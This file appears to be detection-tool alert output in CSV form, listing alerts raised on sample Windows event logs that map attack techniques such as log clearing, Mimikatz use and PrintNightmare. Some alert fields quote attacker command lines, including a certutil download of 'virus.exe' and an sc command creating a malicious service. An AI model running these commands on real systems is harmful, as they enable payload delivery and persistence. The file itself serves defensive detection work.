logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.856 
+09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 05:17:07.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc create hacker-testl3 binPath=""3virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x64c | User: admmig | LID: 0x123550",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service created (command).evtx
2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
2021-10-27 19:35:56.899 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf08 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3388 | PGUID: 7CF65FC7-A881-617A-0605-000000001300 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
2021-10-31 23:28:15.331 +09:00,jump01.offsec.lan,4104,low,Disc,Suspicious Get Local Groups Information,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
2021-10-31 23:28:15.342 +09:00,jump01.offsec.lan,4103,low,Disc,Suspicious Get Local Groups Information,,rules/sigma/powershell/powershell_module/posh_pm_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx
2021-11-02 23:15:24.567 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: certutil -urlcache -split -f https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/blob/master/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec%20remote%20trask%20creation%20(GLOBAL).evtx virus.exe | Path: C:\Windows\System32\certutil.exe | PID: 0xedc | User: admmig | LID: 0x5ba37",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx
